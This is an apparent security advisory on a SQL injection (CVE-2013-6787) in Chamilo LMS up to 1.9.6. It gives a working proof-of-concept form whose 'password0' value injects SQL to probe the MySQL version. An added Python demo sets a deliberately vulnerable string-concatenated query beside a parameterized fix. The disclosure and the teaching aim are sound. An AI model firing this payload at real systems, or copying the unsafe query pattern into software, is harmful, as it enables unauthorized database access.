High-Tech Bridge advisory HTB23182
Nov 06, 2013

SQL Injection in Chamilo LMS

www.htbridge.com

EPSS: 0.001 (Low), percentile 34.8%

High-Tech Bridge Security Research Lab discovered a vulnerability in Chamilo LMS, which can be exploited to perform SQL Injection attacks.

  1. SQL Injection in Chamilo LMS: CVE-2013-6787
    The vulnerability exists due to insufficient validation of the “password0” HTTP POST parameter passed to the “/main/auth/profile.php” script. A remote authenticated attacker can execute arbitrary SQL commands in the application’s database.
    The following exploitation example displays the version of the MySQL server:
    <form action="http://[host]/main/auth/profile.php" method="post" name="main">
    <input type="hidden" name="password0" value="' OR substring(version(),1,1)=5 -- ">
    <input type="hidden" name="password1" value="password">
    <input type="hidden" name="password2" value="password">
    <input type="hidden" name="apply_change" value="">
    <input type="hidden" name="firstname" value="first_name">
    <input type="hidden" name="lastname" value="last_name">
    <input type="hidden" name="username" value="username">
    <input type="hidden" name="official_code" value="USER">
    <input type="hidden" name="phone" value="">
    <input type="hidden" name="language" value="">
    <input type="hidden" name="extra_mail_notify_invitation" value="">
    <input type="hidden" name="extra_mail_notify_message" value="">
    <input type="hidden" name="extra_mail_notify_group_message" value="">
    <input type="hidden" name="_qf__profile" value="">
    <input type="hidden" name="" value="">
    <input type="submit" id="btn">
    </form>
    Successful exploitation of this vulnerability requires that the application is configured during installation not to encrypt users’ passwords (“Encryption method” option is set to “none”).
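
The flaw class and its fix, as an added example that is not Chamilo's code or part of the original advisory: a current-password check built by string concatenation beside one that binds parameters and compares outside SQL. Assumptions: the table schema, function names and sample password are hypothetical, SQLite stands in for MySQL (with `version()` and `substring()` emulated), SHA-256 stands in for any non-"none" encryption method, and the reading that hashing the input before it reaches the query is why the "none" setting matters is an inference, not something the advisory states.

```python
import hashlib
import hmac
import sqlite3

# Value of the password0 field in the advisory's form.
PAYLOAD = "' OR substring(version(),1,1)=5 -- "

def make_db(stored_password):
    """In-memory SQLite stand-in for the MySQL user table (hypothetical schema)."""
    db = sqlite3.connect(":memory:")
    # Emulate the two MySQL functions the payload calls; "5.5.0" is constructed.
    # Returning int mimics MySQL's implicit string-to-number comparison.
    db.create_function("version", 0, lambda: "5.5.0")
    db.create_function("substring", 3, lambda s, pos, n: int(s[pos - 1:pos - 1 + n]))
    db.execute("CREATE TABLE user (user_id INTEGER PRIMARY KEY, password TEXT)")
    db.execute("INSERT INTO user VALUES (1, ?)", (stored_password,))
    return db

def encode(password, method):
    """'none' keeps the password as typed; otherwise a hex digest (stand-in)."""
    if method == "none":
        return password
    return hashlib.sha256(password.encode()).hexdigest()

def check_vulnerable(db, user_id, password0, method):
    """Current-password check built by string concatenation (unsafe pattern)."""
    value = encode(password0, method)
    sql = f"SELECT 1 FROM user WHERE user_id = {int(user_id)} AND password = '{value}'"
    return db.execute(sql).fetchone() is not None

def check_hardened(db, user_id, password0, method):
    """Fetch by bound parameter, then compare outside SQL in constant time."""
    row = db.execute("SELECT password FROM user WHERE user_id = ?", (user_id,)).fetchone()
    if row is None:
        return False
    return hmac.compare_digest(row[0].encode(), encode(password0, method).encode())

def demo():
    plain = make_db(encode("s3cret", "none"))
    hashed = make_db(encode("s3cret", "sha256"))
    return {
        "vulnerable/none": check_vulnerable(plain, 1, PAYLOAD, "none"),
        "vulnerable/hashed": check_vulnerable(hashed, 1, PAYLOAD, "sha256"),
        "hardened/none": check_hardened(plain, 1, PAYLOAD, "none"),
        "hardened/correct": check_hardened(plain, 1, "s3cret", "none"),
    }

if __name__ == "__main__":
    print(demo())
```

Only the concatenated check with unencoded input accepts the advisory's value; the digest removes the quote characters as a side effect, while parameter binding removes the injection point regardless of the storage setting.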
CPE    Name           Operator    Version
       chamilo lms    le          1.9.6